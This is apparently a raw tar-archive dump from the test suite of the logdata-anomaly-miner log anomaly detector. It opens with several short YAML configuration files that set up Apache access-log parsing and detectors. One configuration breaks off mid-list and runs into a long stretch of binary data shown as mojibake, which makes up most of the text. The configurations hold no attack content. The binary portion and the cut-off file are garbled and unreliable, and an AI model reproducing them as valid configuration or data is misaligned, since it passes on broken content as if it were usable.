type: NewMatchPathValueComboDetector id: NewMatchPathValueComboDetector paths: ["/accesslog/method","/accesslog/request","/accesslog/useragent"] learn_mode: False EventHandlers: - id: stpe type: StreamPrinterEventHandler logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/data/configfiles/main.yml000066400000000000000000000012451500476301700266320ustar00rootroot00000000000000LogResourceList: - 'file:///var/log/apache2/access.log' Parser: - id: 'sub1' type: Sub1 name: 'sub1' - id: 'sub2' type: Sub2 name: 'sub2' - id: 'sub3' type: Sub3 name: 'sub3' - id: 'apacheModel' type: ApacheAccessModel name: 'apache' - id: 'START' start: True type: 
FirstMatchModelElement name: 'model' args: - sub1 - sub2 - sub3 - apacheModel Input: timestamp_paths: [""] EventHandlers: - id: stpe type: StreamPrinterEventHandler logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/data/configfiles/missing_parserstart_config.yml000066400000000000000000000026121500476301700333350ustar00rootroot00000000000000AminerUser: 'aminer' # optional default: aminer AminerGroup: 'aminer' # optional default: aminer LogResourceList: - 'file:///var/log/apache2/access.log' Core.PersistenceDir: '/tmp/lib/aminer' Parser: - id: 'apacheModel' type: ApacheAccessModel name: 'apache' args: 'apache' - id: 'firstModel' type: SequenceModelElement name: 'model' args: apacheModel Input: multi_source: False # optional timestamp_paths: "/model/accesslog/time" Analysis: - type: NewMatchPathValueDetector paths: ["/model/accesslog/status"] persistence_id: 'accesslog_status' # optional default: Default output_logline: False learn_mode: True - type: NewMatchPathValueComboDetector paths: ["/model/accesslog/request","/model/accesslog/method"] learn_mode: True persistence_id: 'accesslog_request' # optional default: Default output_logline: False allow_missing_values: False # optional default: False - type: NewMatchPathValueComboDetector paths: ["/model/accesslog/request","/model/accesslog/status"] learn_mode: True EventHandlers: - id: stpe json: True # optional default: False type: StreamPrinterEventHandler - id: syslog type: SyslogWriterEventHandler logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/data/configfiles/multiSource_config.yml000066400000000000000000000017521500476301700315510ustar00rootroot00000000000000LearnMode: True # optional Core.PersistenceDir: '/var/tmp/test2/aminer' LogResourceList: - 'file:///var/tmp/test2/log/access.log' Parser: - id: host_name_model type: VariableByteDataModelElement name: 'host' args: '-.01234567890abcdefghijklmnopqrstuvwxyz:' - id: 'startModel' start: True type: SequenceModelElement name: 'accesslog' args: - host_name_model Input: 
multi_source: True # optional timestamp_paths: "/model/accesslog/time" Analysis: - type: NewMatchPathValueDetector id: NewMatchPathValueDetector paths: ["/accesslog/status"] learn_mode: True - type: NewMatchPathValueComboDetector id: NewMatchPathValueComboDetector paths: ["/accesslog/method","/accesslog/request","/accesslog/useragent"] learn_mode: False EventHandlers: - id: stpe type: StreamPrinterEventHandler logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/data/configfiles/multiple_components.yml000066400000000000000000000173201500476301700320070ustar00rootroot00000000000000LearnMode: True # optional Core.PersistenceDir: '/var/tmp/test2/aminer' LogResourceList: - 'file:///var/tmp/test2/log/access.log' Parser: - id: host_name_model type: VariableByteDataModelElement name: 'host' args: '-.01234567890abcdefghijklmnopqrstuvwxyz:' - id: identity_model type: VariableByteDataModelElement name: 'ident' args: '-.01234567890abcdefghijklmnopqrstuvwxyz:' - id: user_name_model type: VariableByteDataModelElement name: 'user' args: '0123456789abcdefghijklmnopqrstuvwxyz.-' - id: new_time_model type: DateTimeModelElement name: 'time' date_format: '[%d/%b/%Y:%H:%M:%S +0000]' - id: sq3 type: FixedDataModelElement name: 'sq3' args: ' "' - id: request_method_model type: FixedWordlistDataModelElement name: 'method' args: - 'GET' - 'POST' - 'PUT' - 'HEAD' - 'DELETE' - 'CONNECT' - 'OPTIONS' - 'TRACE' - 'PATCH' - id: request_model type: VariableByteDataModelElement name: 'request' args: '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ.-/()[]{}!$%&=G?LGP+tG?+%G?FWfG?!zm>G?Y0G?.ɨG?e$"G?fٶ#G?n\G?L]G?b~G?jV=G?OmEG?:0 G?煃؃G?F8G?v3$G?^5ȃG?< G?(G?G?}}dG?+NT:G?̿FiG? j*G?-O(G?T-G?k.AG?sp G?X(G?)8n8lG?G?"۝,G?V幒G?}*,Ƹ-G?{: G?&$G?TG?K$$d%G?SquG?U0 G?mP#"G?؁>/G?}?uG?ӜSG?eu2G?6t[G?fAG?ĜHG?G?(~zeG?ap'G?ӕpG?^4G?SG?:2x*G?ӮL G?쎐"G?]kG?7RG? G?xG? 
"`}G?럖?OG?LDMG?(WG?MfG?>-HVG?G?ٶR.<=G?>|MG?ﲜ'G?/MԻG?XRkG?!١rG?azvG?_q G?IxG?@rCG?[ogG??.PG?esdXG?G?ʇՏCUG?š,yG?^!9G?w#r G?"2G?҂s'IG?"qG?r?G?XAG?vEG?D dG?cVVG?#qG?4VG?~cG?cATG?P)+G?k"UG?m~U<0G?UBG?jGM G?zD7G?E( BG?G(LG?_٧G?@ZG?ÊD@nG?}UH'G?K 4ӏG?a}~|G?Ҭp%^G?cj<LJG?FG?س+]fG?YQPG?:G? 3G?= 6@G?LG?Lo`aG?VהG?(KG?_:x晴G?ָ*_ G?^ɮzCG?*sG?B~G? LAG?~>yG?ÍyyG?vHSS^G?vt1G?R3G?AkW~G?%G?˾+' %?G?4G?)WzG?[sdG?oxQ"G?Y,G?7xW G?!B3]G?9rbvG?9,G?ʧG?޻ZFG?,Q*G?noG?^ 9w$G?TVG?^^G?t/M0MdG?KQꟊG?Ϻ;0 G?y5FG?Ɣ1"!G?G?ksG?ꆺG?Q5!G?ׇY CG?pUG?29{'>G?2i G? .c[RG?x0G%G?ڈ&ICG?#G?=fsjG?\z)G?ê.G?]￵vG?./xG?_G?pHG?G?f|G?G?cwG?ꎟr)BG?MdG?{LUrG?ѧ G?C"G?"4nG?VdG?Ú YG?S;P(G?⤬G?WVQG?1%IG?4j{G?a+/G?[=G?QGG?+ 6G?J%G?U.M7G?y'KG?˼n TG?ܓG?.G?Ñ~NG?; VG?᮵߹G?o4G>`qG?'՝wG?*EG?emItG?SG?-YG?JG?=5eG?nY-IG?LMG?Mb@ȍG?tG?msG?2G?ٽYNG?mFO9G?@ ޱG?ЭG?5G?5p\G?̔G?L2G?d0N\G?s ӳG?#ʑG?rsG?ɛ뾊?G?z)G?dQG?ȄgG?=H 5G?ESЄG?CsG?fdaG?׊MʥG?ڱ“G?S;G?׸FG?J~*. G?]ċ"G?ųB}TG?ͪ+XG?EhwG?哇+Y#G?X.kGG?{1G?놊HWG?-ۃG?+-aWG?2NgG?R~e G?>RzG?{G?ØlKqG?EG?PөsG?ИG?젱XˠG?йqkG?:pArG?%yG? &G?ٷ%Lm G?dX JzG?y:SG?qi)G?V`02G?0lG?N-JG?„}&G?q&G?ځ9θG?H2 G??]G?<6 23G?1ݬ:G??>lG?眻wG?z>ˠ(G?μG?ӊG? pY zG?bԂG?T6cenG?zJG?0nwG?gdCG?1ʟ"G?W[]ǠG?FG?Եr8).G?24G?cjG?\rLM!G?`lXG?KƜG?c!BG?{EG?-<%ZG?YuiG?G?Qǣ|G?}RG[G?EoTsG?KH"G?`G?AX:G?x}>G?G?ǻyQG?DAhG?P]BCG?6G?G?0G?qbsyG?%G?ڮG?L_(SG?N>G?ӘG?rg1dG?䐅G?JG?u$k(G?.G?= -qG?pj{^G?ոxG?DTG?2fTG? zOG?Mش@G?獧W'G?ﺟH0dG?~.wxG?ߧ](G? G?˶G?bG?LEG?_RsG?йdՉ+G?J:v7G?ÐG?` ҃G?U?G?G?fgnG?G?I4[G?n0G?9p?G?&KG?ASG?VL0_LG?E=G?yn G? hG?K G?ҶFEG?N6G?㑀ۅG?NG2G?M#{G?bȻ$G?ѓԮ G?'Q?G?:jdG?fH#CUG?TҥRG?!@vG?#wG?SSdG?f G?JG?`܄G?Op2ZQG?EbK G?G?V=G?0C{G?uON-G?ӈY9G?P?#G? O_asG?bG?9pG?!rjrG?`2G?; (G?8>A]G?eفG?ƫص|G?VcxG?MG?U3=G?ݜ[G?jG?`,G?RnG? [G?K/G?z A\G?QG?)}G?`:G?ͶeLG?!G?xXD\G?S^tG?;G3`G?d%;ZG?SMG?NrG?v4@G? 
G?p&G?1_G?+[uG?b,G?tZOG?FG?lʗG?"cjG?g8暥G?=d3G?p֌G?EUG?䇂G?ݬG?精T>c*G?h@9G?#ɑG?ہwG?~,Qt5G?-yAG?,e8|uG?=fNG?:G?*G?-&G?huq@G?rG?fG?6O7G?ptG?tlsG?`@Ye~G?:`G?z)LG?SG?_=G?fV G?X~9 G?fTK?G?D/pG?#$G?v} G?'j:(G?U\NG?jCyG?-5G?N.nG?5G?^m%нG>m*FG?l(pG?%G?c'G?DTbG?XG?-rcG?B2xTG?9NG?d7:G?TCG?M nG?0BlG? G?7'Oe(G?%@́G?}\" G?+eG?4w7]qG?G?.mG?QݡG?cG?,0G?ԝRG?邩WꅑG?zYmG?U?B;rG?&K7G?VY.*G?[?}G?#ayG?ΆЧU:G?$nG?fx/G?="G??w!G?0rw.=G?'G?G?1dG?Ǘ^VG?\!G.G?b=&G?*EG?B"TG?.8%G?xsG? m G?+*oG?}~QG?":+G?Te/G?*>3u_G?cl4G?'G?u G?$ G? x?G? 3G?&K>G?C 湫G?Z_G?㟭Ĉ)G?eÚGG?˚QG? G?!#ЁG?WIG?XɽإG?ǁ}G?ﵭG?/G?侕K G?lqG?xBG?G?{ G?i)<G?ږo9G?{ G? lG?ݩ8xI4G?NcVۭG?݅3AhG?LlG?tG?Q𐆚 G?.wl0G?|%.G?&A+G?_: G?F]0G?[!G?;~^9G?kOG?'7j0G?F;ZG?ޓ鞋G?ֻ*W G?)M RG?喜l)G?׆ 7ZG?ymG?YG??ՃG?G//jG?ÊWg+G?߹&G?>~CG?-IIG?{paG?ZGH(G?G?꺜(G?nG?'oG?\{&G?ᄼGeG?ѱJ(9cG?KBsG>؉1G?r!G?<G?M/gG>⳥r\G?\rG?M|G?iT8G?uz]G?咜cG?TW*OG?96G?!+G?6xEG?-VG?X]`G?[S&G? ,G?a:G?െ"G?]OG?8ԟG?mnG?V y 4G?ᄾLׯ-G? G?ؤە{G?r; G?Rk;j7G?A 0G?#9AG??FFG?ʔ!B7 @G? cNVG?H._G?k* XEG?7-iG?h3EiRG?]XG? GG?[G?W?G?T G?1ԅPG?҄G?L냌G?}ۥ,G? >G?\CG?~öG?}XG?阘OG?:G?om 8G?:MOG?"EVG?'G?;XG?$@XG?$UG?j]G?x0µG?9WlG?iN$G?2(G?.|G?|~3G?ˈYqKG?rt٪G?ӽpQyG?›'7G?;G?G?(G??G?ޘ*G?˘O~!&G?ԝVG?.ka6G?5{@G?fxG?͔ouG?݉v)G?ҹ'!G?lSFN G?'5G?RDG?G?qDnJG?}G?ݓoG?r'ퟺG?ةԱG?VmF@G?Dyv-RAG? G?bIJG?EG?3G?{B/ӔG?ܦQ^G?M*ږ\G?V8G?:ɕ\ G?h`a4G?2DQ,G?IUaNYG?}TG?4AYG?|_nG?` G?0CvG?TG?ڑ~G?G? ꅮXUG?ӕ@tB$G?Z BG?|mKvG?tJ G?W;G?Reґ:G?Kף)%G?Sb\tG?Q6ޞ8G?a@/G?eG?!+G?^6)G?Qu$iG?Tx G?T5\G? y)G?~/G?mL`dG?vG?[ 舦8G?SBMXG?db|G?L VIG?cߟG?=_G?1SG?penG?ٗ wG?v1G?G?AG?t |ӓG?kSG?.j\JG?@*G?iฤ"G?hv4G?pG?.EBG?0`B}G?D~(G?vG? ŧ@G?wȽG?RTgG?cDQG?YV G?X)G?wn^4=G?±naeG?S zG?㎏CQG?ٸG?)~،G?{[G?G??ۙG?Sd7G?֌[G?桖zcG?р*ڢDG?fG?,ᕀG?klG?>GC}G?NBDG?AC 8G?‹92G?M G?~~mbKG? gG?G?VgL~G?U RG?G?G?D^4ٷ4G?ذڄG?~S2¡G?u]G?­G?`':G?kΆ{G?Ei.G?˦WnN"G?dG?̷)z3G?.N*fG?U5ܾG?]KG?/No/G?:lG?lAȫG?CVG?a]G?\!G?+6oG?\~޾SG?OXG?|1gG?av G?]G?›G? 
dG?G?Nx3!G?UKIG?UO G?ӂhV:G?6 {G?YLTG?sG?إ_!G?( ڼG?@O2G?aLG?y,bG?7G?hG?qQC5G?5G?]_-*G?_5G?NLlrG?B&G?ϙGG?WշwG?1~G?#3]G?&7Vc~G?pcҲG?-6VifG?͢G?}jp6G?̚>'G?bjzG?뒳G?Gj^G?߀G?уG?⫻)G?斄['G?.G?\m 0G?pñiG?pydG?ҪG?O{G?ȱBIG?*G?˅ѐG?vzG?ꠏXG?_G?c;)"YG? łvG?o+[b(G? ?G?p:9G?%U֨G?ܯ>G? UG?G G+1G?0fG?+LkG?Y@HqG? ^jG?쾠 LG?`@G?AG?Tn G?)(G?Ʋ5M`G? ^T G? MEG?oW/:G?eSG?2tKΓG?ҨhG?+pw1G?2s iG? G?ɟZEG?txJ\`G?8,@G?1G?$vG?t}"G?ъXE+G?=Ǥ G?q3vG?$J:G?޶kG?UG?古eG? 1OS@G?G?~2 oG?h+G?yG?]G?G?ŜMG?b3G?Miӧ0YG?GU\G?ݶLVG?a|YG?yHG?Ј( $G?U G?orjG?b>6UG?fFZG?o\ԓG?^ kG?k"G?=L"߻G?=MG?Ϙ<]G?a7G?EoG?k5G?: G?_B:`G?(A G?x>^}G?}G?nnG?CG?~G?ҧJjsG?]6G?=GG?{t2rG?B7 WG?M/ZbuG?\tG?G? G?3QׯȮG?cFG?ȡzG?-,YG?T)nG?CdRrG?UG?N+G?|2.^ G??G?LhG?ԐӦ G?.xG?+uiG?k7G?ˬ?nDG?#G?[_)>G?i&G?>Dd:G?(W&G?{O X۹G?ﹰ!?{G?0(\G?n,[icG?y )=G?М@l|G?f#:z+G?3%{aG?HIZ.G?}8 G?v*nG?lyfaG? e@G?a"G?z(NG?,O)G?ڂ9<G?8kVG?:j⃕G?SfpYG?֤F1G?.UUG?O7~G?x? G?/=NQG?B_G?4}mG?PWG?쭴/G?"ti^G?CwG?aK~G?aG?(H"zEG? ޶G?(ZG?NJG?CQG?і\.G?)-ZG?'ZnPG? J?G?!٦G?136fG?T4?G?_9G?hM3G?~,XG?^ݹG?>0G?XӟR#G?[G?Ri8G?0IG?ԃG?)G?R2G?¤_%G?؊pbG?p?DmG?, xG?&'sG?:!G?G?G?yG?ԽnGG?W G?0p-G?,D0G?}G?*RGG?C%jnNG?ߞ{nuG?S̉iUnG?q7G?bHG?ď&G?MG?M3G?GG?p{bzG?"6G?(tG?fG?ںw Y$hG?I9G?Z5G?G?h#evG?Ug*UG?薈1s=G?EMG?m}G?ǣYfG?G?ρH~zQG?쓔v9G?G?uɝRG? 2)G?#rੈwG? ؾ=G?' cZG?PG?́:QNG?}\G?q7fG?r`+G?G?I%G?,81G?Rx}~(G?<G?h_`G?")JG?aBG?%&eEG?նZ6G?c+4}G?Ib7G?󺰇G?1 bG?2G?$z-*G?SE G?Q˭G?3yG?][FG?*5LG?Ӱ6i5VG?ysG?DG?؁w,qG?ݻԝ|NG?F:G? ȕG?yJn_G?WG?꿣T|G?qc?G?;iq/G?G?ͤ,bG?b _G?sꇨG?ꡍqG?ARG?&wG?nQ`G?ȤHG?Խ&EG?G? 
6zSG?ݛ}7?Rhh Cj?Rhh C?Rhh Co;?Rhh C(9J?Rhh C[Zn?Rhh Cr*=2A_`?Rhh C\4?Rhh Cמ*?Rhh C t?Rhh C(?Rhh C;Jz+ ?Rhh CW4~?Rhh Cb1?Rhh CP9?Rhh C/ K?Rhh CDDd?Rhh CXx?Rhh C&A>Z0o?Rhh C;%?Rhh C _?Rhh C :}?Rhh CS{?Rhh CBn?Rhh C.?Rhh CfR?Rhh CJ?Rhh C^d?Rhh Ci[?Rhh C4'8?Rhh Cmj1?Rhh Cd0XQg?Rhh C ܍8?Rhh Cc?Rhh Cma?Rhh C2!}?Rhh CcS?Rhh C ~N?Rhh Cn%p?Rhh C5,a?Rhh Cl >e?Rhh C0_~?Rhh C?$uE0?Rhh C!?Rhh CEFV?Rhh Cq_=H?Rhh CY:~e?Rhh C&F{1?Rhh C3?Rhh Cߏ1RI?Rhh C&DB?Rhh C+n{?Rhh C|2?Rhh Cm%?Rhh C>վ1?Rhh Ce.?Rhh CHf?Rhh Cc㌙?Rhh Cxɖ?Rhh C4b?Rhh CDn j+?Rhh CQTU?Rhh C~s#?Rhh CAcj+?Rhh CZ􁯄?Rhh C++0?Rhh C(aX?Rhh CvŮV8?Rhh C ,5?Rhh Cш?Re.logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/data/vtd_data/beta1_data_test7000066400000000000000000000647021500476301700275260ustar00rootroot00000000000000i](](G?ӘXKG?|G?wG?jW G?z|yG>G?yG?8hn\G?^ְ̉KG? 깸G?M G?vGDG?\vQG?_eHyG?ɥ,G?@G?N-pG?wgCG?k:G?.aG?t tG?+)NG?ڙhG?ݍa5G?t0OG?>/kUG?Æ3G?s_G?AcG?Җ rG?ոb1G?T]/hjG?Ɉ+G?ۄ0K r!G?̦7sEG?N'NG?VvmG?A[wnDG?QF6|G?eoG?ulf%G?G?*jOG?\NZ9G?NG?rxG?f?GG?0F}DG?bG?ZOG?]tDsG? )dG?>BG?4vG?ߣ-G?~݅G?oD]+%G?3GaqG?BˮxG?jRG?oG?1>j`G?C=LG?!G?hJ -G?|G?} ӥG?G?RG?*G]SG?Ң$G?3G?{Yr>&G?!OG?wKԢG?@aG?}sG?ŇZG?ݿ0G?8x G?(x+G?G?7mG?؏G?v~G?O;΂G?;H-G?U7U=G?_[&G?'GG?c@IG?`5GG?^CGOG? HOWG?rjG?T\G?d1dG?g1zFG?I"(H8G? &G?!}-G?ٙZ1\G?q G?PZG?wGCG?+>lG?M>G?eIBG?Jsc-G?!G?nuG?j?H:WG?w'=G?/G?4m;G?aCލsG?ՐxG?\) W G?1\:1rG?*$IG?2zTaG?hn"G>6DuKrG?ދÉG?.>TG?D)7zG?oG?/w`G?nG?a]WG?d72G?ܳѿkG?1n)G?;(rG?[.Ŋ1G?(`XG?אG?(^G?NF#PG?>ISG? d_G?RgLG?P`yG?9"G?K']FG?G?G?~MG?эG?#t0G?èbG?<+/G?=f0G?G?4ks7 wG?̅ G?3WG?wɀG?%Q{G?\&G?O9:nG?9;D'm)G?ƻκZ=4G?ޅhSG?hG?!/bG?Z{vG?lG?GBnLMG?+WJG?}uTG?oCC.G?S_/G?&UPhG?mCKG?9/'G?\xRG?`G?۫G?΁ԏG?1lG?R(0LG?G?%G?r\\1G?vە+G?_)+cG?k)%dG?4ڌIG? ?G?6)~G?2CG?fp,G?&WG?u-تG?& #g:G?h]k_G?r+6oG?S$zG?8B3.G?*G?JkG?H^}75G?tVJ y3|G?-0^!G?ҕAG?(BG?*o^G?ǵDG?vTLG?$G?'G?33G?-dG?#ING?{xG??$kwG?_[A$G?+YJG?_ G?~G?̕{U&G?&D8G? 5~)kG?Vc+G?ՅrG? G?ܦ=G?͒Ɨ8G?κ-G?̖ G?nPAG?xa.)G?5)6G?3HG?t^kG?qJkG?BtgG?Ƙ G?w>]G?/#"G?w-5 G?#gOG?e=YdG?ň*j|G?̣G?O#jG?H=G?yG?/G?hG?HUjG?0;G?5G?6i>G?pFG?5f G? 
.qG?iG?fmG?YG?7EG?.cG?1]-uG?CWPG?J3jG?DOG?J-xG?eٝG?46G? ;~wG?@JG?G)!6G?uP踋G?x=:bG?b#G?`NRG?rG?XhsLG?E5G?ų0G?țG?ɒrG?@{"!G?ӑ;G?"G?wG??U?&=G?wG? )OG?0@G?Һ9L :G?nyG?-`BG?=#T*G?dG?n1mG?ڶ'G?-Q`G?7HuG?"G?񳌉;G?iG?#qG?ɞvG?읳{^G?n`UG?K G?1FG?yG?+5G?HOmG?WRٛ:G?FeG?\QG?e: G?V EG?.[y$G?ESG?M=:G?-j G?ߥj`G? (4G?͢89q'G?bG?Ʒ5pG? O0G?G?nzG?eG?=-G?l1G?ֳ"leG? =\QG?ϙtG?UWDG?; jG?єH>,G?o̵G?c IaG?}vG>QoٹG??ݱG?ul_G?#gG?ta՛G?sfG?JZG?fatԞG?uCsl֤G?Ѣ5 G?JJG?kġk%qG? @G?D}q:G?B/G?ֹG?JJG?F;UfG?ק8G?]G XwG?ˎKG?q G?mG?\wL8G?' mI-G?EG?uNG?;NӸG?YG?T {hG?zFqG?MG?ҝ&U]G?ze`aG?G?N4XgG?wG?ǐG?DG?³G?QJvS2G?۟*G?G G?u=L(G?5{G?Akm`fG?BÕ;IG?&nG?OwWqG?^/ G?~ *{7G?{G?O5G?Q˱.RG?߰BMG?/OsG?z>hG?xЦG?eG?7vG?L G?@ZG?xx)G?Yb&MG? ,NG?jWG?g#kRG?ΌswG?G?X:tG?++#G?[/DG?djG?tG?§ŏG?[ G?6.^^G?;G?ýUQ,G?呾G? `?5G?G?G?ݨFo.sG?XFG?3:G?Bjkv;G?(F:G?_ٗcکG?ԫނVG?=K{yG?Eikd G?IG?,kG?22'WVG?(iG?P[Z\G?VjsG?P"G?Øhl G?ʸbbG?:CG?%֌G?|):G?0G?΄ҋ~G?sAiG?X@JG?A=^KjcG?ʓ]lG?X<"G?p)FG?/qopG?!tYG?^wqG?I׍ƇG?J G?a:FG?b G?`>G?\JG?ɣ%ڠG?Ӆ04zG?ϗy“G?SV&G?,ҚG?K+G?6R G?nG?6NG?ﭏgG?M|0NG?S++G?41eG?htnHG?u` G?5sG?[~u G?#dŘG?FvG?a+ NG?G?+M%cG?#G?97vG?=[ \G?!G?a,G?:oZG?4dտG? ?;0p;G?du`G?\D}G?/1KG?v5G?;*{G?ՔᆉG?3hmG?FLG?4fEG?<_}G?kG?ٙG?Vg)G?k&77G?^B*G?%^G?ٖw%G?s'9(G?@G?i25G?탱qZG?nGk rG?G?G?礶^y~G?#̺G?䝺rG?j G?BYUG?}{G?y1-G?~ۋ G?2#G?bBG?AzG?v pG?*G?ƌjȉ:G?ӳ\G?ƥ,G?XaG?X XG?߻G?۔" G?>;G?仴K~$G?ٍ0VqG?e:LG?G?ﻻG?H7aeG?KTG?Pj/G?쪎G??G?sm+G?GG>w5G?$S/^G?SGG?ZG?J G?ZIG?)cG?5!MG?ƌG?LCHG?vG?^R:G?YMG?o瀾G?鶞^hVG? ~G?ً G?*V|G?΀G?],UG?j!UzG? ]G?2bśG?G?bיG?*~fG?*G?/ _G?{IG?qڙgG?H\դG?;{QDG?i1XG?7 [G?^G?,߫G?S˅G?RRyG?R@BG?lGЉG?ȧ(G?3a>G?؇wƕG?'$_G?G?G?1{ 2G?V_G?RBG?epG?1>s*G>˗8 8G?-zG? 2G?<1]:G?a G?3Jh~G?,빩G?&G?^[G?'tWD7G?ʍJ|'G?RWOG?М1{G?VKG?KpЄ>G?)}-)G?JLbG?#ԫG? EPG?b:G?wu(ZG?G'KG?Ji{G?)G?-r G?z<=eG?&23G?d ,/G?=ItG?XeMzG?vҳaG?`XVG?ȄJG?r@/G?̙xG?qvx]G?a/+G?o G?͢3JG?;,G?vsG?mݦG?\t6G?.d G?n#|3G?Y_hG?b[G?n(?AcG?TU<_G?9JG?q kG?G?ӎG?>P"G?wYA@)sG? 
+G?/CG?O@q]G?$"G?iRyG?ԅeG?&(fG?,ctG?`存G?㪨G?]]t=|G?SAG?ʔJ|G?6G?ZfkG?2QG?s0`G?%T(>1G?kF@G?c/3G?29 G?6w'G?P"ŸG?JBÚG?ұG?y6G?h+X3G?} G?ݚ zbG?8cG?|%9G?sh#G?LF3G?%0e(G?FVLzMG?g`BuG?9G?:iG?NAG?&G?ٟd@"NG?! 2G?ś'G?4㝕G?BD0QG?܉G?aM)G?g&a}G?ԭ wG?yB5G?j^[G?U#G?6G?堽nG?N{4(G?W"?iAG?~ G?* AG?CFMG?I;! G?t4G?#~.G?5G?|\ChG?l8%,G?(HxsG?y9WG?oG?}톐)G?ޮН=G?.E+G?}tG?;NG?+Q G?6G?s/3G?덮%_G?ZڜG?(찙G?`dG?)"imG?}&x.G?v`,cG?)$%cG?kc!G? JG?+.U`gG?#չG??=G?cWG?љ _UG?C\G?Շ#oG?횉C0G?S?x)G?QPG?N6tG?ġj'6TG?'҄DG?7fcG?<ρC9G?2r QG? +G?lnvG?;m5G? `G?G?{G?S 4`G?gBG?gKG?ksG?V=#fG?袌4FG?xhOG?aG? Cط G?VG?G?ԡh~G?hZrG?~_hG?"G?f/ G?Ŭ#G? G?gTG?zG?iۗlG?l㗎G?V8)]1G?S5TG?DoaKG?jL%G?r8G?Ȁ6-XG?F@5!GG?6{pxG?ʱ|3G?G?γ)룿FG?u&G?~9jG? *}G??G?OgG?6G?!G?+ `G?CG?QG?4ZGDG?1&ݓG?&FG?G?)Q@UG?v1Q@G?G?ЪIG?<HG?.nQG?”AIG? ?ĶG?לG?+NG?Ʉ&_G?˗MG?vr*G?2G?/I%.G?S8 G?/B޾G?Z qG?nSG?!?SG?Զ/KG?V)zG?1݇ G?q|SG?LuK;HG?jTG?B5 VG?ꉾ$ G?F{0G?c^G?@kv-G?4gknG?۠RQG? ޡ G?GpרMG?IhG?3 4G?s .h `G?$7G?t G?ϯnG? G?_p:G?pG?cZG?R5#G?홦/uG?n:?G?~' G?WJG?߅IiG?f G?lEQG?dEOG?|#yG?w6G?ݿugG? KgH G?2]i4G?#y5G?h7G?u@wyG?d `G? lG?[pG?cG?PGG?LPG?̆G?FDLG?돮G?Fѫ.G?SlǧG?"f!G?fX*VG?G?axG?ҙhDG?}F^G?hG?,1uG?g1qG?zh1G? G?QaXG?'G?js~¶G?. }nG?'G?MBSG?ZiG?G?)!?߽G?6G? G?C/G?Е G?I!KlG?~G>ODZ_G?5\?/>G?wT]f;G?OG?:AG?[KkG?J72G?o.sG?2qzG?hO8XG?N=\G?͔>JG?ւBG?TQ*G?^sӜWG?VkһG?4rR޽G?駺iG?5h.G?vGG?lh2G?PxG?ဉ'l=G?8G?e$G?z(iG?Lt-G?GjtG>wG?S"D%G?G??@~G?ՖNG?T-G?{ܬJWG?kvG?P$,G?;܂G?wq%G?cZ9nG?6rG?C:G?Wz6`aG?fy$G?魠jCG?QT%OG?OU,G?s"3W-G?m!3UG?7 G?]殗G?y9d G?о},bAG?E vhG?ꇊN\G?-crG?Aլ)KG?2c%MG?yioGG?qUk.G?喝nG?Ks8TG?ٷ%>"G?vOG?>G?O"WkG?c -'`eG? \!eG?￉V/G? ,rG?ٍ~CG?s#G?]N>G? q*~#G?HZ&/G?u o@CG?)nWG?NAn3NG?!xG?e]G?w,9zG?ŷwG?,hG?EխG?G?wc G?@G?Е@LG?#G?nF G?'>5G?佥'vG? o^G?:S6G?o\UG?0 4G?!m5rG?`GG?3رG?CG?킨CG?,1rSG?_iG??-G?~pG?IJG?(6G? G?mxG?& G?FG?˃&FG?{.-~G?Z=3XG?TO$zyG?#q.PG?tzjEG?oW*3G?RpG?`}]vG?@G?(:AR G?Gj5G? suG? 
X7G?(G?}`3G?>;G?VZɎlG?UG?5cgG?qw4eG?x4vG?TxzG?2pG?!?,buG?q fG?(}eG?pG?na$G?-8RIG?oCG?Zz2G?>`G?"FG?e"MG?jG?p}G?@޼G?P G?ѻ˼G?;盗G?)jҦG?XZ>G?iG?A媅G?ھ.dG?G^8G?MjUG?춼oG?q=%vG?WjG?ّFvG?KfьG?eh1G?P_G?@G?:;G?"F(+G?RG?r6xUG?S";3G?qG?'G?֍]AOG?[8)G?]]GG?aK&G?8hMLeG?}_G?.VךG?СG?5G? 88hG?aG?ƻǦG?yG?yG?G?լDG?MuY\G?p<%eqG?#oٓ5?G?C^>:G?ٝ3tG?v@;G?PX"G?۽ pqG?cCsG?xOz%G?(ܻ?:G??G?G??Y21G?R2G?/G?WXͳ9G?{JoG? < G?TH35gG?-G?ˮjG?%Q`G?얫tG?A tG?Ңޥ/G?+QuG??iCG?ϖG?ԻG?沒8ЁG?E"G?xCG?D$wG?gG?cYOG?^0a:G?w%t"G?M;OG?ϿvG?VG?ɔ)G?,[ bG?˔pCG?悛=ĉG?[ݐtG?ZRG?#$G?X9G?V):G?@}(G?7 eG?IEG?sBLG?SyG?DG?Ŝ0aG?]G? >G?@KW+bG?2wvG? =G?U$ G?ژWՋG?(G?? {uG?A'G?zkqzNG?mȡG?a'urG?YG?~}LG?ͱ`ͻ\G?Æ.G? fq0G?colG?WG?JG?G?8|G?VO;LG?2J~G?M/Z/G?QmG?⾘)BG?**'"G?_4fηG?ޮU%2`G?Ʊl?vG?]$p G?XyRG?h$hG?jCwU-IG?킽oSG?ڥNMƚG?cG?<6A80G? R3}G?녂G?j`avG?ھgGG?ޫ KzG?=G?ǵ;'G? G?{̈́iG?$G?Tg#yG?EG?v~BG?k`G?S Q$G?:]G?vd6;G?/MG?G?y2ɵG?\TG?ZG?Qɼ)G?iG?bG?ȶG?X:qwG?FΔG?P.qG?(cG?ݾe2G?ҳG?#>G?VC{G?Dĩ@+G?[>G?& OG? .G?p{G?۬mhNG?4$;[G?ڐNЪŽG?ǔG?<3G?l G?F^G?2,G?G?.Zk~G?y4سG?*G?>1S5jG?EaG?jj7e?lG?L@G?^G?* G?Z(G?43ROG?z4aG?/=hG?xq(F~G? $G?_mIdIG?|G?+xG?Ԩb|G?Z 2PG?O5G?jG?$f 3G?-G?ӉǓ$G?T,G?dkG?q@M3G?hL\sG??{W3G?T eUG?޺+㯮G?$!_wwG??z,LG?ggG?ЮJG?8nG?hh0G? 9 G?ogOG?UuG?@zG?COG?Mvq87G?ZIG?Xj= G?"oG? 8IG?2P[pG?V'G?VG=G?^G?gnCG?.mޒ9G?֞G?~G?aBG?;,!G?*#OkG?9E(G?O4G?pfG?8x # 'G?鰹FG?4kG?'*'G?G?]*cG?GxeLG?<#G?m\9G?)!K)G?$G?|M'G?ЁG?ϨZ[TG?; 